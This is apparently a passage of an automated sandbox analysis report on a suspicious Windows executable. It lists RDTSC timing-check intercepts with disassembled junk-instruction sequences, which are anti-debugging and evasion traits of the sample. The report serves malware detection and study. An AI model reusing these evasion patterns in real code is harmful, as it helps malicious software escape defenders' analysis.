                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65098F second address: 6509A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2192E858Ch 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6509A0 second address: 6509C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FC218F099B6h 0x00000009 jmp 00007FC218F099C5h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6509C5 second address: 6509C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65F901 second address: 65F905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65F905 second address: 65F923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65F923 second address: 65F960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC218F099C8h 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FC218F099C9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65F960 second address: 65F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FC2192E8586h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65F96F second address: 65F973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 65F973 second address: 65F991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2192E8594h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 662C2D second address: 662C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 66440A second address: 664425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2192E8596h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 664425 second address: 664440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099C4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 664440 second address: 664449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 664449 second address: 66444D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6642A1 second address: 6642A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6642A9 second address: 6642AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 59F26C second address: 59F271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758AE second address: 6758C3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC218F099B6h 0x00000008 jnl 00007FC218F099B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758C3 second address: 6758C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758C9 second address: 6758CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758CE second address: 6758D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758D4 second address: 6758DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758DA second address: 6758DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758DE second address: 6758E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758E4 second address: 6758F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6758F2 second address: 675914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC218F099C9h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 675914 second address: 675945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Ch 0x00000007 jmp 00007FC2192E858Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2192E8591h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 675945 second address: 675949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 675949 second address: 67594D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67831A second address: 67833D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC218F099B6h 0x00000009 jmp 00007FC218F099C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67A922 second address: 67A93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8594h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67A93C second address: 67A94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC218F099BAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67A94F second address: 67A96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8597h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C267 second address: 67C26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C26D second address: 67C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C271 second address: 67C294 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC218F099BAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC218F099BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C294 second address: 67C298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C298 second address: 67C29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C29C second address: 67C2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC2192E8592h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67C2AA second address: 67C2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC218F099B6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 67F37F second address: 67F393 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2192E8586h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6832E9 second address: 6832EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6832EE second address: 683339 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pushad 0x00000007 je 00007FC2192E8586h 0x0000000d jnl 00007FC2192E8586h 0x00000013 jne 00007FC2192E8586h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jl 00007FC2192E8586h 0x00000025 js 00007FC2192E8586h 0x0000002b jne 00007FC2192E8586h 0x00000031 popad 0x00000032 jmp 00007FC2192E8599h 0x00000037 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 683339 second address: 683341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 682E88 second address: 682E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 682E8E second address: 682E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 682E97 second address: 682E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 682E9D second address: 682EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 69C850 second address: 69C874 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2192E8588h 0x00000008 jns 00007FC2192E858Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007FC2192E8586h 0x0000001b pop ebx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 69E35E second address: 69E381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC218F099C1h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 69E381 second address: 69E39B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2192E8586h 0x00000008 jc 00007FC2192E8586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A4457 second address: 6A445C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A4609 second address: 6A460F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A460F second address: 6A4619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A4619 second address: 6A461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A461D second address: 6A463D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC218F099C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A4D6C second address: 6A4D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A4ECA second address: 6A4EE3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC218F099B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FC218F099B6h 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A52C6 second address: 6A52D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FC2192E8586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A52D2 second address: 6A52E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C2h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A52E8 second address: 6A52EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A52EC second address: 6A52F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A85BB second address: 6A85EA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FC2192E858Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jc 00007FC2192E8590h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A85EA second address: 6A85F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A8867 second address: 6A886C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A886C second address: 6A88E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, ecx 0x0000000a push dword ptr [ebp+136332D1h] 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC218F099B8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a call 00007FC218F099B9h 0x0000002f pushad 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 jno 00007FC218F099C4h 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FC218F099C4h 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push eax 0x00000046 push edx 0x00000047 js 00007FC218F099BCh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A88E1 second address: 6A88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A88E5 second address: 6A88F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C0h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A88F9 second address: 6A8911 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC2192E8586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e je 00007FC2192E85A0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A8911 second address: 6A8915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A8915 second address: 6A8930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 6A8930 second address: 6A894C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5AC9E1 second address: 5AC9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5AC9E6 second address: 5AC9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1B4B second address: 46B1B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1B51 second address: 46B1B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1B55 second address: 46B1BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC2192E8598h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FC2192E8590h 0x00000014 call dword ptr [76FF188Ch] 0x0000001a mov edi, edi 0x0000001c push ebp 0x0000001d mov ebp, esp 0x0000001f push ecx 0x00000020 mov ecx, dword ptr [7FFE0004h] 0x00000026 mov dword ptr [ebp-04h], ecx 0x00000029 cmp ecx, 01000000h 0x0000002f jc 00007FC21931A065h 0x00000035 mov eax, 7FFE0320h 0x0000003a mov eax, dword ptr [eax] 0x0000003c mul ecx 0x0000003e shrd eax, edx, 00000018h 0x00000042 mov esp, ebp 0x00000044 pop ebp 0x00000045 ret 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FC2192E8597h 0x0000004d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1BA6 second address: 46B1A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 16CD78EAh 0x00000008 pushfd 0x00000009 jmp 00007FC218F099BBh 0x0000000e add al, FFFFFF8Eh 0x00000011 jmp 00007FC218F099C9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b jmp 00007FC218F099BEh 0x00000020 ret 0x00000021 nop 0x00000022 xor esi, eax 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 call 00007FC21D1A8965h 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1A30 second address: 46B1A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1A37 second address: 46B1A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C1h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1A4C second address: 46B1A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ch, bh 0x00000011 mov esi, 738CFEEBh 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1A6F second address: 46B1A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bl, 64h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC218F099C2h 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1A8E second address: 46B1AAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC2192E858Bh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1AAF second address: 46B1B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FC218F099C4h 0x00000011 push esi 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 mov cx, di 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC218F099C2h 0x00000022 jmp 00007FC218F099C5h 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1B0F second address: 46B1B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
